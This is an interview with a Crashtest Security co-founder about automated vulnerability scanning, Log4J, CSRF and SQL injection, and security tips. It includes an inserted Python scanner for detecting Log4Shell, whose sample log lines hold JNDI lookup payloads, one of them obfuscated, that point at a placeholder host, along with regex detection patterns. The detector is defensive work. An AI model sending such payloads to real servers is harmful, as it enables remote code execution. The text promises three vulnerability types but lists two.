The global pandemic has pushed many businesses towards digitization with no adequate time to prepare. Employees have switched to remote working and unfortunately, not all companies were capable of implementing strong security solutions to ensure the safety of their network.
As a result, threat actors have started to actively search for system vulnerabilities to expand their attack vectors. If a security gap is found, hackers can infiltrate the network with malicious programs and cause damage to the company.
Today, we had a chat with the Co-Founder and Managing Director at Crashtest Security, Felix Brombacher, about how enterprises can mitigate these risks with automated vulnerability scanning software.
You can also read about other useful security solutions here.
What was the journey like since your launch back in 2017?
Our journey began at university when René and his fellow students came up with the idea of developing an automated vulnerability scanner as part of a project. Back then, there was no easy-to-use solution available in the market.
Over the last couple of years, we have continuously improved and are better positioned than ever. This improvement is also reflected in the progress of our product and the team’s know-how. We try to release new features in structured intervals and give our customers exactly what they need.
For example, last year, we introduced the Privilege Escalation Scanner. It allows organizations to automate scanning of their web applications and effectively identify vulnerabilities that could lead to hackers gaining complete control.
Can you tell us a little bit about what you do? What makes Crashtest Security stand out?
Our motto is – vulnerability scanner made easy. Crashtest Security aims to make cybersecurity vulnerability scanning accessible to everyone. Yet, our primary focus is on modern development teams and IT managers of small and medium-sized enterprises with SaaS or digitized products. Our scanner identifies and fixes security vulnerabilities with a click of a button.
In addition, we provide professional customer support and offer a detailed knowledge base that allows anyone to run scans without any problems. Best of all, our vulnerability scanner is automated, saving organizations essential resources, such as budget and time.
What types of technology do you use to detect and analyze vulnerabilities?
We primarily use scanners and features that we’ve built by ourselves. In this sense, we try to rely as little as possible on third-party solutions. As a cybersecurity Software as a Service (SaaS) company, we take security on our end very seriously. It’s important that our customers receive the best value for their money.
For example, our cloud-based solution means one does not have to install anything in the network or own servers. All customers need to do is enter the URL they want to scan, and they are ready to go.
Did you notice any new methods used by threat actors arise during the pandemic?
With the pandemic, we saw a rise in digitization, like work-from-home policies, which naturally led to larger attack surfaces for hackers. Outside the office, there is less protection and deterrence against cyberattacks. So, now employees are more vulnerable to phishing attacks. Thus, threat actors are now acting more aggressively and appearing more frequently.
In June 2020, a report by Swissinfo.ch showed that the number of cyberattacks in April 2020 more than doubled compared to the previous year. This growing number of cyber threats means an expanding market with increasing demand.
Recently, there has been a lot of commotion around the Log4J vulnerability. Could you briefly explain why it is so serious?
When Log4J 2.0 was released, the new function known as the Lookups – used for adding additional data to the log entries – appeared as well. The Java API "JNDI Lookup" (Java Naming and Directory Interface) communicates with a directory service, resolving internal user identifiers into actual user names.
URI is a data type that the LDAP server can return. It references a Java class loaded into memory and executed by the Log4J instance. Improper input validation in the Log4J library results in the injection of an arbitrary LDAP server from an untrusted source.
Since developers usually expect data written into logs to be dealt with as standard text, and software performs regular text validation, no additional input validation is conducted, and any untrusted user input enters the logs.
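The answer above describes untrusted input reaching the logs as lookup strings. As an added example (not code from the interview or from Crashtest Security), here is a small defensive scanner in Python that normalizes nested text-rewriting lookups and flags log lines containing a JNDI lookup; the log lines, IP addresses and hostnames are constructed sample data.

```python
import re

# Constructed sample log lines (not from the page): lines 2 and 3 carry a JNDI
# lookup in the User-Agent field, line 3 wrapped in a nested ${lower:...} lookup.
SAMPLE_LOGS = [
    '203.0.113.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.6 - - "GET /login" 200 "${jndi:ldap://lookup.example/a}"',
    '203.0.113.7 - - "GET /" 200 "${${lower:j}ndi:rmi://lookup.example/b}"',
    '203.0.113.8 - - "GET /" 200 "${env:HOME}"',
]

# Innermost lookups that merely rewrite text: ${lower:x}, ${upper:x}, ${...:-x}
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup type the answer describes: ${jndi:...} in any letter case
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested text-rewriting lookups, innermost first, so the
    literal they would produce becomes visible to a plain pattern match."""
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for every line that contains
    a JNDI lookup after normalization. Other lookups (e.g. ${env:...})
    are left for a separate, broader rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {number}: {line}")
```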
What web application vulnerabilities do you run into most often?
Based on the different types of applications, we see the following three types of vulnerabilities appear most often:
- Cross-site request forgery (CSRF). It allows attackers to perform actions in an application while the user is logged into it. This type of attack is mainly carried out through the user's browser, but it can be executed through any file as long as the scripting is allowed there. This includes Word and XML documents, RSS feeds, etc.
- SQL injection attack. It inserts SQL queries into client input to access and manage backend databases. These attacks are most common in web applications that rely on dynamic databases but do not have adequate input validation.
It’s important to note that the vulnerabilities in the reports are often not direct attack vectors per se but rather misconfigurations on the web server or in session management.
Would you like to share some tips on how organizations could eliminate these risks?
Our best advice would be to scan for vulnerabilities before every new release or update – whether internally with your security experts or with an automated tool, such as Crashtest Security Suite. The main thing is that experts and software would regularly check web applications and APIs for risks.
In addition, we recommend keeping an eye on security during the development process to save a lot of time and money afterward. This is because fixing vulnerabilities at an early stage is much cheaper. In addition, one should always back up important data.
Companies should also keep up with what, if any, new cybersecurity threats are out there. The best way to do that is to read blogs or websites that provide detailed information about them.
Finally, the rule of using strong passwords and Two-Factor Authentication (2FA) still applies. This increases security, and you can keep a good overview with password management tools.
As for individual users, what security tools would you recommend for personal use?
I would not necessarily recommend specific tools. Instead, I would suggest following certain security rules that can help minimize the risks of attacks. For example, using 2FA makes cracking user passwords much more difficult for hackers. This type of authentication can be set up in different ways. For instance, users can use their email as a second authentication factor or separate applications, like Authy.
It’s also equally important neither to write down your passwords at work, nor to save them in any file on your PC. If you want to keep your passwords in one safe place, there are applications for this, such as LastPass or KeePass.
It’s worth mentioning that using modest browsers also reduces cybersecurity risks. However, if you want to go one step further, you should also pay attention to which search engine you use. For secure privacy, duckduckgo.com would be a good choice, among others.
And finally, what does the future hold for Crashtest Security?
We will continue to help companies identify and optimally protect themselves against hacker attacks and other cybersecurity threats. For us, this means that we will continue to move forward with product development, saving our customers even more time. Product development and improving our Sales and Marketing teams are major factors helping us establish our product on the market.